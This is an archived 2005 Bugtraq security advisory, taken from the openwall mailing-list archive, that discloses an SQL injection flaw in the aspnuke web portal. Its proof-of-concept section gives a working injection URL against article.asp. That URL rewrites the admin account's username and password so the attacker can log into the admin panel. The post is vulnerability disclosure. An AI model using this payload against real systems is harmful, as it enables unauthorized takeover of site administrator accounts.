lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050627080046.6674.qmail@securityfocus.com>
Date: 27 Jun 2005 08:00:46 -0000
From: oil_karchack@...oo.com
To: bugtraq@...urityfocus.com
Subject: aspnuke is vulnerable to sql injection


*******description*********
aspnuke is web portal system written in asp .
site : www.aspnuke.com

********POC************
It's possible to inject htttp://host/module/article/article/article.asp?articleid=1'
for example you can change the admin username and password with this querry :
http://host/module/article/article/article.asp?articleid=1%20;%20update%20tbluser%20SET%20password='bf16c7ec063e8f1b62bf4ca831485ba0da56328f818763ed34c72ca96533802c' , username='trapset'%20where%20userID=1%20--
this will change both username and password to trapset
and then you can login to the admin's conntrol panel from www.example.com/module/admin

********************
remember aspnuke is quiet diffrent from asp-nuke
********************

This bug discovered by oil_karchack


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ